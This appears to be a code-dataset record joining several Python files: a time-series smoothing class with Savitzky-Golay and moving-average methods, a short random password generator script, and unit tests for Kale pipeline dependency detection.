            entries are np.nan.
        """
        if not isinstance(self.window_length, int):
            raise ValueError("k must be int.")

        # Left-pad with nans so the output keeps the input's length; the
        # nans propagate through the convolution for the first
        # window_length-1 entries.
        signal_padded = np.append(np.nan * np.ones(self.window_length - 1), signal)
        signal_smoothed = (
            np.convolve(
                signal_padded, np.ones(self.window_length, dtype=int), mode="valid"
            )
            / self.window_length
        )
        return signal_smoothed

    def left_gauss_linear_smoother(self, signal):
        """Smooth the y-values using a local linear regression with Gaussian weights.

        DEPRECATED: This method is available to help sanity check the 'savgol' method.
        Use 'savgol' with poly_fit_degree=1 and the appropriate gaussian_bandwidth instead.

        At each time t, we use the data from times 1, ..., t-dt, weighted
        using the Gaussian kernel, to produce the estimate at time t.

        Parameters
        ----------
        signal: np.ndarray
            A 1D signal.

        Returns
        ----------
        signal_smoothed: np.ndarray
            A smoothed 1D signal.
        """
        warnings.warn(
            "Use the savgol smoother with poly_fit_degree=1 instead.",
            DeprecationWarning,
        )
        n = len(signal)
        signal_smoothed = np.zeros_like(signal)
        # A is the regression design matrix
        A = np.vstack([np.ones(n), np.arange(n)]).T  # pylint: disable=invalid-name
        for idx in range(n):
            weights = np.exp(
                -((np.arange(idx + 1) - idx) ** 2) / self.gaussian_bandwidth
            )
            AwA = np.dot(  # pylint: disable=invalid-name
                A[: (idx + 1), :].T * weights, A[: (idx + 1), :]
            )
            Awy = np.dot(  # pylint: disable=invalid-name
                A[: (idx + 1), :].T * weights, signal[: (idx + 1)].reshape(-1, 1)
            )
            try:
                beta = np.linalg.solve(AwA, Awy)
                signal_smoothed[idx] = np.dot(A[: (idx + 1), :], beta)[-1]
            except np.linalg.LinAlgError:
                # NOTE(review): `self.impute` is a bound method and therefore
                # always truthy, so this fallback always uses the raw value;
                # kept as-is because the method is deprecated.
                signal_smoothed[idx] = (
                    signal[idx]  # pylint: disable=using-constant-test
                    if self.impute
                    else np.nan
                )
        if self.minval is not None:
            signal_smoothed[signal_smoothed <= self.minval] = self.minval
        return signal_smoothed

    def savgol_predict(self, signal, poly_fit_degree, nr):
        """Predict a single value using the savgol method.

        Fits a polynomial through the values given by the signal and returns the value
        of the polynomial at the right-most signal-value. More precisely, for a signal of length
        n, fits a poly_fit_degree polynomial through the points signal[-n+1+nr], signal[-n+2+nr],
        ..., signal[nr], and returns the evaluation of the polynomial at signal[0]. Hence, if
        nr=0, then the last value of the signal is smoothed, and if nr=-1, then the value after
        the last signal value is anticipated.

        Parameters
        ----------
        signal: np.ndarray
            A 1D signal to smooth.
        poly_fit_degree: int
            The degree of the polynomial fit.
        nr: int
            An integer that determines the position of the predicted value relative to the signal.

        Returns
        ----------
        predicted_value: float
            The anticipated value that comes after the end of the signal based on a polynomial fit.
        """
        coeffs = self.savgol_coeffs(-len(signal) + 1 + nr, nr, poly_fit_degree)
        predicted_value = signal @ coeffs
        return predicted_value

    def savgol_coeffs(self, nl, nr, poly_fit_degree):
        """Solve for the Savitzky-Golay coefficients.

        Solves for the Savitzky-Golay coefficients. The coefficients c_i
        give a filter so that
        y = sum_{i=-{n_l}}^{n_r} c_i x_i
        is the value at 0 (thus the constant term) of the polynomial fit
        through the points {x_i}. The coefficients are c_i are calculated as
        c_i = ((A.T @ A)^(-1) @ (A.T @ e_i))_0
        where A is the design matrix of the polynomial fit and e_i is the standard
        basis vector i. This is currently done via a full inversion, which can be
        optimized.

        Parameters
        ----------
        nl: int
            The left window bound for the polynomial fit, inclusive.
        nr: int
            The right window bound for the polynomial fit, inclusive.
        poly_fit_degree: int
            The degree of the polynomial to be fit.

        Returns
        ----------
        coeffs: np.ndarray
            A vector of coefficients of length nr - nl + 1 that determines the savgol
            convolution filter.
        """
        if nl >= nr:
            raise ValueError("The left window bound should be less than the right.")
        if nr > 0:
            warnings.warn("The filter is no longer causal.")

        A = np.vstack(  # pylint: disable=invalid-name
            [np.arange(nl, nr + 1) ** j for j in range(poly_fit_degree + 1)]
        ).T

        if self.gaussian_bandwidth is None:
            mat_inverse = np.linalg.inv(A.T @ A) @ A.T
        else:
            weights = np.exp(-((np.arange(nl, nr + 1)) ** 2) / self.gaussian_bandwidth)
            mat_inverse = np.linalg.inv((A.T * weights) @ A) @ (A.T * weights)
        window_length = nr - nl + 1
        coeffs = np.zeros(window_length)
        for i in range(window_length):
            basis_vector = np.zeros(window_length)
            basis_vector[i] = 1.0
            coeffs[i] = (mat_inverse @ basis_vector)[0]
        return coeffs

    def savgol_smoother(self, signal):  # pylint: disable=inconsistent-return-statements
        """Smooth signal with the savgol smoother.

        Returns a convolution of the 1D signal with the Savitzky-Golay coefficients, respecting
        boundary effects. For an explanation of boundary effects methods, see the class docstring.

        Parameters
        ----------
        signal: np.ndarray
            A 1D signal.

        Returns
        ----------
        signal_smoothed: np.ndarray
            A smoothed 1D signal of same length as signal.
        """
        # Reverse because np.convolve reverses the second argument
        temp_reversed_coeffs = np.array(list(reversed(self.coeffs)))

        # Smooth the part of the signal away from the boundary first
        signal_padded = np.append(np.nan * np.ones(len(self.coeffs) - 1), signal)
        signal_smoothed = np.convolve(signal_padded, temp_reversed_coeffs, mode="valid")

        # This section handles the smoothing behavior at the (left) boundary:
        # - shortened_window (default) applies savgol with a smaller window to do the fit
        # - identity keeps the original signal (doesn't smooth)
        # - nan writes nans
        if self.boundary_method == "nan":
            return signal_smoothed

        # boundary methods "identity" and "shortened window"
        for ix in range(min(len(self.coeffs), len(signal))):
            if ix == 0 or self.boundary_method == "identity":
                signal_smoothed[ix] = signal[ix]
            else:
                # At the very edge, the design matrix is often singular, in which case
                # we just fall back to the raw signal
                try:
                    signal_smoothed[ix] = self.savgol_predict(
                        signal[: ix + 1], self.poly_fit_degree, 0
                    )
                except np.linalg.LinAlgError:  # for small ix, the design matrix is singular
                    signal_smoothed[ix] = signal[ix]
        return signal_smoothed

    def savgol_impute(self, signal, impute_order):
        """Impute the nan values in signal using savgol.

        This method fills the nan values in the signal with polynomial interpolation
        on a rolling window of the immediate past up to window_length data points.

        A number of boundary cases are handled involving nan filling close to the boundary.

        Note that in the case of many adjacent nans, the method will use previously
        imputed values to do the fitting for later values.

        Parameters
        ----------
        signal: np.ndarray
            A 1D signal to be imputed.
        impute_order: int
            The polynomial order of the fit used for imputation.

        Returns
        ----------
        signal_imputed: np.ndarray
            An imputed 1D signal.
        """
        if impute_order > self.window_length:
            raise ValueError("Impute order must be smaller than window length.")

        signal_imputed = np.copy(signal)
        for ix in np.where(np.isnan(signal_imputed))[0]:
            # Boundary cases
            if ix < self.window_length:
                # At the boundary, a single value should just be extended
                if ix == 1:
                    signal_imputed[ix] = signal_imputed[ix - 1]
                # Otherwise, use savgol fitting on the largest window prior,
                # reduce the polynomial degree if needed (can't fit if the
                # imputation order is larger than the available data)
                else:
                    signal_imputed[ix] = self.savgol_predict(
                        signal_imputed[:ix], min(ix - 1, impute_order), -1
                    )
            # Away from the boundary, use savgol fitting on a fixed window
            else:
                signal_imputed[ix] = self.savgol_predict(
                    signal_imputed[ix - self.window_length : ix],
                    impute_order,
                    -1,
                )
        return signal_imputed
| 42.157371 | 100 | 0.615933 | """Smoother utility.
This file contains the smoothing utility functions. We have a number of
possible smoothers to choose from: windowed average, local weighted regression,
and a causal Savitzky-Golay filter.
Code is courtesy of Dmitry Shemetov, Maria Jahja, and Addison Hu.
These smoothers are all functions that take a 1D numpy array and return a smoothed
1D numpy array of the same length (with a few np.nans in the beginning). See the
docstrings for details.
"""
from typing import Union
import warnings
import numpy as np
import pandas as pd
class Smoother: # pylint: disable=too-many-instance-attributes
"""Smoother class.
This is the smoothing utility class. This class holds the parameter settings for its smoother
methods and provides reasonable defaults. Basic usage can be found in the examples below.
The smoother function takes numpy arrays or pandas Series as input, expecting the values to be
on a regularly-spaced time grid. NANs are ok, as long as the array does not begin with a NAN.
The rest of the NANs will be handled via imputation by default, though this can be turned off.
Parameters
----------
smoother_name: {'savgol', 'moving_average', 'identity', 'left_gauss_linear'}
This variable specifies the smoother. We have four smoothers, currently:
* 'savgol' or a Savtizky-Golay smoother (default)
* 'moving_average' or a moving window average smoother
* 'identity' or the trivial smoother (no smoothing)
* 'left_gauss_linear' or a Gaussian-weight linear regression smoother
Descriptions of the smoothers are available in the doc strings. Full mathematical
details are in: https://github.com/cmu-delphi/covidcast-modeling/ in the folder
'indicator_smoother'.
poly_fit_degree: int
A parameter for the 'savgol' smoother which sets the degree of the polynomial fit.
window_length: int
The length of the fitting window for 'savgol' and the averaging window 'moving_average'.
This value is in the units provided by the data, which are likely to be days for Delphi.
Note that if window_length is smaller than the length of the signal, then only the
imputation method is run on the signal.
gaussian_bandwidth: float or None
If float, all regression is done with Gaussian weights whose variance is
half the gaussian_bandwidth. If None, performs unweighted regression. (Applies
to 'left_gauss_linear' and 'savgol'.)
Here are some reference values (the given bandwidth produces a 95% weighting on
the data of length time window into the past):
time window | bandwidth
7 36
14 144
21 325
28 579
35 905
42 1303
impute: {'savgol', 'zeros', None}
If 'savgol' (default), will fill nan values with a savgol fit on the largest available time
window prior (up to window_length). If 'zeros', will fill nan values with zeros.
If None, leaves the nans in place.
minval: float or None
The smallest value to allow in a signal. If None, there is no smallest value.
Currently only implemented for 'left_gauss_linear'. This should probably not be in the scope
of the smoothing utility.
boundary_method: {'shortened_window', 'identity', 'nan'}
Determines how the 'savgol' method handles smoothing at the (left) boundary, where the past
data length is shorter than the window_length parameter. If 'shortened_window', it uses the
maximum window available; at the very edge (generally up to poly_fit_degree) it keeps the
same value as the raw signal. If 'identity', it just keeps the raw signal. If 'nan', it
writes nans. For the other smoothing methods, 'moving_average' writes nans and
'left_gauss_linear' uses a shortened window.
Methods
----------
smooth: np.ndarray or pd.Series
Takes a 1D signal and returns a smoothed version.
The input and the output have the same length and type.
Example Usage
-------------
Example 1. Apply a rolling average smoother with a window of length 10.
>>> smoother = Smoother(smoother_name='moving_average', window_length=10)
>>> smoothed_signal = smoother.smooth(signal)
Example 2. Smooth a dataframe column.
>>> smoother = Smoother(smoother_name='savgol')
>>> df[col] = df[col].transform(smoother.smooth)
Example 3. Apply a rolling weighted average smoother, with 95% weight on the recent 2 weeks and
a sharp cutoff after 4 weeks.
>>> smoother = Smoother(smoother_name='savgol', poly_fit_degree=0, window_length=28,
gaussian_bandwidth=144)
>>> smoothed_signal = smoother.smooth(signal)
Example 4. Apply a local linear regression smoother (essentially equivalent to
`left_gauss_linear`), with 95% weight on the recent week and a sharp
cutoff after 3 weeks.
>>> smoother = Smoother(smoother_name='savgol', poly_fit_degree=1, window_length=21,
gaussian_bandwidth=36)
>>> smoothed_signal = smoother.smooth(signal)
Example 5. Apply the identity function (simplifies code that iterates through smoothers _and_
expects a copy of the raw data).
>>> smoother = Smoother(smoother_name='identity')
>>> smoothed_signal = smoother.smooth(signal)
"""
def __init__(
self,
smoother_name="savgol",
poly_fit_degree=2,
window_length=28,
gaussian_bandwidth=144, # a ~2 week window
impute_method=None,
minval=None,
boundary_method="shortened_window",
):
"""See class docstring."""
self.smoother_name = smoother_name
self.poly_fit_degree = poly_fit_degree
self.window_length = window_length
self.gaussian_bandwidth = gaussian_bandwidth
self.impute_method = self._select_imputer(impute_method, self.smoother_name)
self.minval = minval
self.boundary_method = boundary_method
valid_smoothers = {"savgol", "left_gauss_linear", "moving_average", "identity"}
valid_impute_methods = {"savgol", "zeros", "identity"}
valid_boundary_methods = {"shortened_window", "identity", "nan"}
if self.smoother_name not in valid_smoothers:
raise ValueError("Invalid smoother_name given.")
if self.impute_method not in valid_impute_methods:
raise ValueError("Invalid impute_method given.")
if self.boundary_method not in valid_boundary_methods:
raise ValueError("Invalid boundary_method given.")
if self.window_length <= 1:
raise ValueError("Window length is too short.")
if smoother_name == "savgol":
# The polynomial fitting is done on a past window of size window_length
# including the current day value.
self.coeffs = self.savgol_coeffs(
-self.window_length + 1, 0, self.poly_fit_degree
)
else:
self.coeffs = None
def _select_imputer(self, impute_method, smoother_name):
if impute_method is None and smoother_name != "identity":
return "savgol"
if impute_method is None and smoother_name == "identity":
return "identity"
return impute_method
def smooth(
self, signal: Union[np.ndarray, pd.Series], impute_order=2
) -> Union[np.ndarray, pd.Series]:
"""Apply a smoother to a signal.
The major workhorse smoothing function. Imputes the nans and then applies
a smoother to the signal.
Parameters
----------
signal: np.ndarray or pd.Series
A 1D signal to be smoothed.
impute_order: int
The polynomial order of the fit used for imputation. By default, this is set to
2.
Returns
----------
signal_smoothed: np.ndarray or pd.Series
A smoothed 1D signal. Returns an array of the same type and length as
the input.
"""
# If all nans, pass through
if np.all(np.isnan(signal)):
return signal
is_pandas_series = isinstance(signal, pd.Series)
pandas_index = signal.index if is_pandas_series else None
signal = signal.to_numpy() if is_pandas_series else signal
# Find where the first non-nan value is located and truncate the initial nans
ix = np.where(~np.isnan(signal))[0][0]
signal = signal[ix:]
# Don't smooth in certain edge cases
if len(signal) < self.poly_fit_degree or len(signal) == 1:
signal_smoothed = signal.copy()
else:
# Impute
signal = self.impute(signal, impute_order=impute_order)
# Smooth
signal_smoothed = self._select_smoother()(signal)
# Append the nans back, since we want to preserve length
signal_smoothed = np.hstack([np.nan * np.ones(ix), signal_smoothed])
# Convert back to pandas if necessary
if is_pandas_series:
signal_smoothed = pd.Series(signal_smoothed)
signal_smoothed.index = pandas_index
return signal_smoothed
def _select_smoother(self):
"""Select a smoothing method based on the smoother type."""
if self.smoother_name == "savgol":
return self.savgol_smoother
if self.smoother_name == "left_gauss_linear":
return self.left_gauss_linear_smoother
if self.smoother_name == "moving_average":
return self.moving_average_smoother
if self.smoother_name == "identity":
return lambda x: x
raise ValueError(f"invalid smoother {self.smoother_name}")
def impute(self, signal, impute_order=2):
"""Impute the nan values in the signal.
See the class docstring for an explanation of the impute methods.
Parameters
----------
signal: np.ndarray
1D signal to be imputed.
impute_order: int
The polynomial order of the fit used for imputation.
Returns
-------
imputed_signal: np.ndarray
Imputed signal.
"""
if self.impute_method == "savgol":
# We cannot impute if the signal begins with a NaN (there is no information to go by).
# To preserve input-output array lengths, this util will not drop NaNs for you.
if np.isnan(signal[0]):
raise ValueError("The signal should not begin with a nan value.")
imputed_signal = self.savgol_impute(signal, impute_order)
elif self.impute_method == "zeros":
imputed_signal = np.nan_to_num(signal)
elif self.impute_method == "identity":
imputed_signal = np.copy(signal)
return imputed_signal
def moving_average_smoother(self, signal):
"""Compute a moving average on the signal.
Parameters
----------
signal: np.ndarray
Input array.
Returns
-------
signal_smoothed: np.ndarray
An array with the same length as arr, but the first window_length-1
entries are np.nan.
"""
if not isinstance(self.window_length, int):
raise ValueError("k must be int.")
signal_padded = np.append(np.nan * np.ones(self.window_length - 1), signal)
signal_smoothed = (
np.convolve(
signal_padded, np.ones(self.window_length, dtype=int), mode="valid"
)
/ self.window_length
)
return signal_smoothed
def left_gauss_linear_smoother(self, signal):
"""Smooth the y-values using a local linear regression with Gaussian weights.
DEPRECATED: This method is available to help sanity check the 'savgol' method.
Use 'savgol' with poly_fit_degree=1 and the appropriate gaussian_bandwidth instead.
At each time t, we use the data from times 1, ..., t-dt, weighted
using the Gaussian kernel, to produce the estimate at time t.
Parameters
----------
signal: np.ndarray
A 1D signal.
Returns
----------
signal_smoothed: np.ndarray
A smoothed 1D signal.
"""
warnings.warn(
"Use the savgol smoother with poly_fit_degree=1 instead.",
DeprecationWarning,
)
n = len(signal)
signal_smoothed = np.zeros_like(signal)
# A is the regression design matrix
A = np.vstack([np.ones(n), np.arange(n)]).T # pylint: disable=invalid-name
for idx in range(n):
weights = np.exp(
-((np.arange(idx + 1) - idx) ** 2) / self.gaussian_bandwidth
)
AwA = np.dot( # pylint: disable=invalid-name
A[: (idx + 1), :].T * weights, A[: (idx + 1), :]
)
Awy = np.dot( # pylint: disable=invalid-name
A[: (idx + 1), :].T * weights, signal[: (idx + 1)].reshape(-1, 1)
)
try:
beta = np.linalg.solve(AwA, Awy)
signal_smoothed[idx] = np.dot(A[: (idx + 1), :], beta)[-1]
except np.linalg.LinAlgError:
signal_smoothed[idx] = (
signal[idx] # pylint: disable=using-constant-test
if self.impute
else np.nan
)
if self.minval is not None:
signal_smoothed[signal_smoothed <= self.minval] = self.minval
return signal_smoothed
def savgol_predict(self, signal, poly_fit_degree, nr):
"""Predict a single value using the savgol method.
Fits a polynomial through the values given by the signal and returns the value
of the polynomial at the right-most signal-value. More precisely, for a signal of length
n, fits a poly_fit_degree polynomial through the points signal[-n+1+nr], signal[-n+2+nr],
..., signal[nr], and returns the evaluation of the polynomial at signal[0]. Hence, if
nr=0, then the last value of the signal is smoothed, and if nr=-1, then the value after
the last signal value is anticipated.
Parameters
----------
signal: np.ndarray
A 1D signal to smooth.
poly_fit_degree: int
The degree of the polynomial fit.
nr: int
An integer that determines the position of the predicted value relative to the signal.
Returns
----------
predicted_value: float
The anticipated value that comes after the end of the signal based on a polynomial fit.
"""
coeffs = self.savgol_coeffs(-len(signal) + 1 + nr, nr, poly_fit_degree)
predicted_value = signal @ coeffs
return predicted_value
def savgol_coeffs(self, nl, nr, poly_fit_degree):
"""Solve for the Savitzky-Golay coefficients.
Solves for the Savitzky-Golay coefficients. The coefficients c_i
give a filter so that
y = sum_{i=-{n_l}}^{n_r} c_i x_i
is the value at 0 (thus the constant term) of the polynomial fit
through the points {x_i}. The coefficients are c_i are calculated as
c_i = ((A.T @ A)^(-1) @ (A.T @ e_i))_0
where A is the design matrix of the polynomial fit and e_i is the standard
basis vector i. This is currently done via a full inversion, which can be
optimized.
Parameters
----------
nl: int
The left window bound for the polynomial fit, inclusive.
nr: int
The right window bound for the polynomial fit, inclusive.
poly_fit_degree: int
The degree of the polynomial to be fit.
Returns
----------
coeffs: np.ndarray
A vector of coefficients of length nr - nl + 1 that determines the savgol
convolution filter.
"""
if nl >= nr:
raise ValueError("The left window bound should be less than the right.")
if nr > 0:
warnings.warn("The filter is no longer causal.")
A = np.vstack( # pylint: disable=invalid-name
[np.arange(nl, nr + 1) ** j for j in range(poly_fit_degree + 1)]
).T
if self.gaussian_bandwidth is None:
mat_inverse = np.linalg.inv(A.T @ A) @ A.T
else:
weights = np.exp(-((np.arange(nl, nr + 1)) ** 2) / self.gaussian_bandwidth)
mat_inverse = np.linalg.inv((A.T * weights) @ A) @ (A.T * weights)
window_length = nr - nl + 1
coeffs = np.zeros(window_length)
for i in range(window_length):
basis_vector = np.zeros(window_length)
basis_vector[i] = 1.0
coeffs[i] = (mat_inverse @ basis_vector)[0]
return coeffs
def savgol_smoother(self, signal):  # pylint: disable=inconsistent-return-statements
    """Smooth a 1D signal by convolving it with the Savitzky-Golay filter.

    The bulk of the signal is smoothed with a single convolution against
    ``self.coeffs``. The first ``len(self.coeffs) - 1`` outputs would need
    samples before the start of the signal, so they are handled according to
    ``self.boundary_method`` (see the class docstring): "nan" leaves them as
    nan, "identity" copies the raw signal, and the default shortened-window
    mode re-fits savgol on the prefix available at each index.

    Parameters
    ----------
    signal: np.ndarray
        A 1D signal.

    Returns
    ----------
    signal_smoothed: np.ndarray
        A smoothed 1D signal of same length as signal.
    """
    # np.convolve flips its second argument, so pre-flip the coefficients.
    kernel = np.asarray(self.coeffs)[::-1]
    # nan-pad on the left so the "valid" convolution has full output length;
    # outputs touching the padding come out nan and are fixed up below.
    padding = np.full(len(self.coeffs) - 1, np.nan)
    signal_smoothed = np.convolve(np.append(padding, signal), kernel, mode="valid")

    if self.boundary_method == "nan":
        return signal_smoothed

    # Left-boundary fix-up for "identity" and "shortened window" modes.
    for idx in range(min(len(self.coeffs), len(signal))):
        if idx == 0 or self.boundary_method == "identity":
            signal_smoothed[idx] = signal[idx]
            continue
        # Shortened window: re-fit on the prefix. At the very edge the design
        # matrix is often singular; fall back to the raw signal there.
        try:
            signal_smoothed[idx] = self.savgol_predict(
                signal[: idx + 1], self.poly_fit_degree, 0
            )
        except np.linalg.LinAlgError:
            signal_smoothed[idx] = signal[idx]
    return signal_smoothed
def savgol_impute(self, signal, impute_order):
    """Impute the nan values in *signal* with Savitzky-Golay extrapolation.

    Each nan is replaced by a polynomial fit over a rolling window of up to
    ``self.window_length`` immediately preceding values. Since nan indices
    are processed left to right, earlier imputed values feed the fits for
    later ones, so runs of adjacent nans are filled progressively.

    Parameters
    ----------
    signal: np.ndarray
        A 1D signal to be imputed.
    impute_order: int
        The polynomial order of the fit used for imputation.

    Returns
    ----------
    signal_imputed: np.ndarray
        An imputed 1D signal.
    """
    if impute_order > self.window_length:
        raise ValueError("Impute order must be smaller than window length.")

    signal_imputed = np.copy(signal)
    for idx in np.where(np.isnan(signal_imputed))[0]:
        if idx >= self.window_length:
            # Interior: fit on a fixed-size trailing window.
            signal_imputed[idx] = self.savgol_predict(
                signal_imputed[idx - self.window_length: idx],
                impute_order,
                -1,
            )
        elif idx == 1:
            # Only one prior value exists; just carry it forward.
            signal_imputed[idx] = signal_imputed[idx - 1]
        else:
            # Near the left boundary: fit on everything available so far,
            # capping the polynomial degree by the amount of data.
            # NOTE(review): idx == 0 also lands here with an empty window --
            # confirm upstream that the first sample is never nan.
            signal_imputed[idx] = self.savgol_predict(
                signal_imputed[:idx], min(idx - 1, impute_order), -1
            )
    return signal_imputed
| 254 | 0 | 27 |
99c8d66d5dd27a05a085cb3dde8290a7fafd8184 | 460 | py | Python | main/generate_password.py | LukeScales1/password_generator | 6c8a5433db9e4552678310a86cc4a0fec93b6e3a | [
"Apache-2.0"
] | null | null | null | main/generate_password.py | LukeScales1/password_generator | 6c8a5433db9e4552678310a86cc4a0fec93b6e3a | [
"Apache-2.0"
] | null | null | null | main/generate_password.py | LukeScales1/password_generator | 6c8a5433db9e4552678310a86cc4a0fec93b6e3a | [
"Apache-2.0"
] | null | null | null | import string
import random
import argparse
parser = argparse.ArgumentParser(description='generate a password with x amount of randomised ascii characters')
parser.add_argument('x', metavar='N', type=int, help='length of desired password string')
args = parser.parse_args()
x = args.x
password_characters = string.ascii_letters + string.digits + string.punctuation
secret_key = ''.join(random.choice(password_characters) for i in range(x))
print secret_key
| 32.857143 | 112 | 0.791304 | import string
import random
import argparse
parser = argparse.ArgumentParser(description='generate a password with x amount of randomised ascii characters')
parser.add_argument('x', metavar='N', type=int, help='length of desired password string')
args = parser.parse_args()
x = args.x
password_characters = string.ascii_letters + string.digits + string.punctuation
secret_key = ''.join(random.choice(password_characters) for i in range(x))
print secret_key
| 0 | 0 | 0 |
54c900e0d3a7383313bb93037c4dc760768ea4ea | 14,793 | py | Python | backend/kale/tests/unit_tests/test_dependencies.py | noushi/kale | 1530ccc6dda3b8a02e2f58f50cfa682adfaf4b80 | [
"Apache-2.0"
] | null | null | null | backend/kale/tests/unit_tests/test_dependencies.py | noushi/kale | 1530ccc6dda3b8a02e2f58f50cfa682adfaf4b80 | [
"Apache-2.0"
] | null | null | null | backend/kale/tests/unit_tests/test_dependencies.py | noushi/kale | 1530ccc6dda3b8a02e2f58f50cfa682adfaf4b80 | [
"Apache-2.0"
] | null | null | null | # Copyright 2020 The Kale Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
from kale import Pipeline, Step
from kale.static_analysis import dependencies
@pytest.mark.parametrize("code,target", [
    ('', []),
    ('a = b', ['b']),
    ('a = foo(b)', ['foo', 'b']),
    ('a = b\nfoo(b)', ['b', 'foo']),
    ('foo(b)', ['foo', 'b'])
])
def test_pyflakes_report(code, target):
    """Check pyflakes_report finds the undefined names each snippet reads."""
    detected = dependencies.pyflakes_report(code)
    # Reported order is not significant, so compare sorted copies.
    assert sorted(detected) == sorted(target)
def test_detect_fns_free_variables():
    """A top-level function's free variables (and globals) are detected."""
    source_code = '''
x = 5
def foo():
    print(math.sqrt(x))
'''
    # foo reads both x and math from the enclosing scope; no keyword deps.
    expected = {"foo": ({"x", "math"}, {})}
    assert dependencies.detect_fns_free_variables(source_code) == expected
def test_detect_fns_free_variables_with_imports():
"""Test the function returns the correct free variables."""
imports_and_functions = """
import math
"""
source_code = '''
x = 5
def foo():
print(math.sqrt(x))
'''
target = {"foo": ({"x"}, {})}
assert target == dependencies.detect_fns_free_variables(
source_code,
imports_and_functions
)
def test_dependencies_detection_free_variable(dummy_nb_config):
    """Test dependencies detection with free variables."""
    # Linear 3-step pipeline: step1 defines x, step2 defines foo (closing
    # over x), step3 calls foo.
    pipeline = Pipeline(dummy_nb_config)

    _source = ['''
x = 5
''']
    pipeline.add_step(Step(name="step1", source=_source))

    _source = ['''
def foo():
    print(x)
''']
    pipeline.add_step(Step(name="step2", source=_source))

    _source = ['''
foo()
''']
    pipeline.add_step(Step(name="step3", source=_source))

    pipeline.add_edge("step1", "step2")
    pipeline.add_edge("step2", "step3")

    dependencies.dependencies_detection(pipeline)
    # step3 needs both foo and its free variable x, so x must flow through
    # step2 even though step2 never evaluates it.
    assert sorted(pipeline.get_step("step1").ins) == []
    assert sorted(pipeline.get_step("step1").outs) == ["x"]
    assert sorted(pipeline.get_step("step2").ins) == ["x"]
    assert sorted(pipeline.get_step("step2").outs) == ["foo", "x"]
    assert sorted(pipeline.get_step("step3").ins) == ["foo", "x"]
    assert sorted(pipeline.get_step("step3").outs) == []


def test_dependencies_detection_inner_function(dummy_nb_config):
    """Test dependencies detection with inner functions."""
    pipeline = Pipeline(dummy_nb_config)

    _source = ["x = 5"]
    pipeline.add_step(Step(name="step1", source=_source))

    _source = ['''
def foo():
    def bar(x):
        print(x)
    bar(5)
''']
    pipeline.add_step(Step(name="step2", source=_source))

    _source = ['''
foo()
print(x)
''']
    pipeline.add_step(Step(name="step3", source=_source))

    pipeline.add_edge("step1", "step2")
    pipeline.add_edge("step2", "step3")

    dependencies.dependencies_detection(pipeline)
    # bar's x is a bound parameter, not a free variable, so step2 has no
    # data dependency on step1; step3 reads the global x directly, though.
    assert sorted(pipeline.get_step("step1").ins) == []
    assert sorted(pipeline.get_step("step1").outs) == ['x']
    assert sorted(pipeline.get_step("step2").ins) == []
    assert sorted(pipeline.get_step("step2").outs) == ['foo']
    assert sorted(pipeline.get_step("step3").ins) == ['foo', 'x']
    assert sorted(pipeline.get_step("step3").outs) == []


def test_dependencies_detection_inner_function_free_variable(dummy_nb_config):
    """Test dependencies detection with free variables and inner function."""
    pipeline = Pipeline(dummy_nb_config)

    _source = ["x = 5"]
    pipeline.add_step(Step(name="step1", source=_source))

    _source = ['''
def foo():
    def bar():
        print(x)
''']
    pipeline.add_step(Step(name="step2", source=_source))

    _source = ["foo()"]
    pipeline.add_step(Step(name="step3", source=_source))

    pipeline.add_edge("step1", "step2")
    pipeline.add_edge("step2", "step3")

    dependencies.dependencies_detection(pipeline)
    # Unlike the previous test, bar reads the *outer* x, so x flows from
    # step1 through step2 to step3.
    assert sorted(pipeline.get_step("step1").ins) == []
    assert sorted(pipeline.get_step("step1").outs) == ['x']
    assert sorted(pipeline.get_step("step2").ins) == ['x']
    assert sorted(pipeline.get_step("step2").outs) == ['foo', 'x']
    assert sorted(pipeline.get_step("step3").ins) == ['foo', 'x']
    assert sorted(pipeline.get_step("step3").outs) == []


def test_dependencies_detection_with_parameter(dummy_nb_config):
    """Test dependencies detection with function with parameter."""
    pipeline = Pipeline(dummy_nb_config)

    _source = ["x = 5"]
    pipeline.add_step(Step(name="step1", source=_source))

    _source = ['''
def foo(x):
    def bar():
        print(x)
''']
    pipeline.add_step(Step(name="step2", source=_source))

    _source = ["foo(5)"]
    pipeline.add_step(Step(name="step3", source=_source))

    pipeline.add_edge("step1", "step2")
    pipeline.add_edge("step2", "step3")

    dependencies.dependencies_detection(pipeline)
    # step1's x is shadowed by foo's parameter, so no step depends on it
    # and step1 produces no outputs.
    assert sorted(pipeline.get_step("step1").ins) == []
    assert sorted(pipeline.get_step("step1").outs) == []
    assert sorted(pipeline.get_step("step2").ins) == []
    assert sorted(pipeline.get_step("step2").outs) == ['foo']
    assert sorted(pipeline.get_step("step3").ins) == ['foo']
    assert sorted(pipeline.get_step("step3").outs) == []
def test_dependencies_detection_with_globals(dummy_nb_config):
    """Test dependencies detection with inner function and globals."""
    # NOTE(review): `_prepend_to_source` is referenced here but not defined in
    # the visible part of this module -- confirm the helper exists upstream.
    imports_and_functions = "import math"
    pipeline = Pipeline(dummy_nb_config)

    _source = ["x = 5"]
    pipeline.add_step(Step(name="step1",
                           source=_prepend_to_source(_source,
                                                     imports_and_functions)))

    _source = ['''
def foo(x):
    def bar():
        math.sqrt(x)
    bar()
''']
    pipeline.add_step(Step(name="step2",
                           source=_prepend_to_source(_source,
                                                     imports_and_functions)))

    _source = ["foo(5)"]
    pipeline.add_step(Step(name="step3",
                           source=_prepend_to_source(_source,
                                                     imports_and_functions)))

    pipeline.add_edge("step1", "step2")
    pipeline.add_edge("step2", "step3")

    dependencies.dependencies_detection(pipeline, imports_and_functions)
    # math is supplied by the shared imports and x is a bound parameter, so
    # only foo itself travels between steps.
    assert sorted(pipeline.get_step("step1").ins) == []
    assert sorted(pipeline.get_step("step1").outs) == []
    assert sorted(pipeline.get_step("step2").ins) == []
    assert sorted(pipeline.get_step("step2").outs) == ['foo']
    assert sorted(pipeline.get_step("step3").ins) == ['foo']
    assert sorted(pipeline.get_step("step3").outs) == []


def test_dependencies_detection_with_pipeline_parameters(dummy_nb_config):
    """Test dependencies are detected with pipeline parameters and globals."""
    imports_and_functions = "import math"
    pipeline = Pipeline(dummy_nb_config)
    # y is a pipeline parameter (value 5, type int), read inside bar below.
    pipeline.pipeline_parameters = {"y": (5, 'int')}

    _source = ["x = 5"]
    pipeline.add_step(Step(name="step1",
